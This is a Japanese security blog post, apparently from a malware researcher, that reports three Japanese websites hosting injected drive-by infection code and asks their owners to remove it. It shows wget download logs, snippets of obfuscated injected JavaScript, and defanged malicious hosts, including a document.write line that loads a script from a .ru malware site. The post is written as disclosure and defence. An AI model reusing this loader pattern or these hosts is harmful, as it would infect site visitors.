#OCJP-060 3件のウェブ感染事件の報告

最近海外のマルウェア対策専門達とチームを作って、力を合わせて、マルウェアのCNCを倒しに行っていますので、このブログを最近更新出来ないので、すみません。殆ど日本の危ないウェブ感染はマルウェアCNCからの攻撃が多いから、ソースを倒せば日本も守れるかと思いますので今集中しております。
しかし、日本のウェブ感染について、見てはいるけど、手続きされてない件だけほっとくは出来ませんが下記のように報告致します。

下記のURLにウェブ経由マルウェア感染コードを発見しました、現在未だアップされています↓
hxxp://www.k5.dion.ne.jp/~tomoya_h/HaraTomoya/
hxxp://e.to.cx/achsec.html
hxxp://joshingroup.jp/estate/jhoshin.js
全て日本のネットワークなので、関係者には上記のサイトにあるマルウェアを削除して下さい。

証拠↓

1. hxxp:// www.k5.dion.ne.jp/~tomoya_h/HaraTomoya/
ダウンロード↓
--04:07:44--  hxxp:// www.k5.dion.ne.jp/~tomoya_h/HaraTomoya/
           => `index.html'
Resolving www.k5.dion.ne.jp... 111.86.142.84
Connecting to www.k5.dion.ne.jp|111.86.142.84|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5,645 (5.5K) [text/html]
04:07:44 (297.72 KB/s) - `index.html.1' saved [5645/5645]

中にあるJSコードは↓
＜script＞var qt;if(qt!='M' && qt!='fy'){q
r K='g';var qG="";var f=RegExp;var o=new
 b=new Array();var N=']';var md;if(md!='
 && Pm != ''){Pm=null};var pE=new Date()
　：
 snip
  ：
};var KN;if(KN!='' && KN!='z
ribute(V, O);var Ky;if(Ky!='
QZ=new String();var QO=new D
'fF'){fW='fF'};H();＜/script＞
下記のマルウェアサイトのリンクが入っています↓
hxxp:// reference-com.google.com.do.telegraph-co-uk.supernewstuff.ru:8080/\n
sify.com/sify.com/msn.com.cn/rapid4me.com/google.com.php 
2. hxxp:// e.to.cx/achsec.html
ダウンロード↓
--04:03:05--  hxxp:// e.to.cx/achsec.html
           => `achsec.html'
Resolving e.to.cx... 210.233.74.164
Connecting to e.to.cx|210.233.74.164|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
04:03:05 (54.33 MB/s) - `achsec.html' saved [4281]

中にあるコードは↓
＜script＞try{vfE++;}catch(ABW
e";n="126&&135&&1470&&1530&&
4&&1740&&966&&1620&&1414&&16
5&&1414&&600&&546&&1470&&155
&1470&&1530&&1596&&1455&&152
&&1414&&480&&1722&&195&&126&
10&&1470&&1740&&1414&&600&&4
　：
 snip
  ：
638&&1635&&1414&&1650&&1624
990&&1694&&1260&&1358&&1545
4&&720&&1302&&690&&1358&&16
826&&195&&126&&135&&1750".s
i%h+016));}ev(s);}＜/script＞
↑下記のURLにIFRAMER経由で転送されます↓
hxxp:// afgreenwich.net/main.php?page=0f123fe645ddf8d7
3. hxxp:// joshingroup.jp/estate/jhoshin.js
ダウンロード↓
--04:18:26--  hxxp:// joshingroup.jp/estate/jhoshin.js
           => `jhoshin.js'
Resolving joshingroup.jp... 59.106.19.85
Connecting to joshingroup.jp|59.106.19.85|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,440 (1.4K) [application/javascript]
04:18:26 (39.97 MB/s) - `jhoshin.js' saved [1440/1440]

中にあるコードは↓
document.write('＜sc'+'ript type="text/javascript" 
src="hxxp:// greatrow.ru/Data_Management.js">＜/scri'+'pt＞');
↑そのままでgreatrow.ruのマルウェアサイトにある感染コードを実行されます。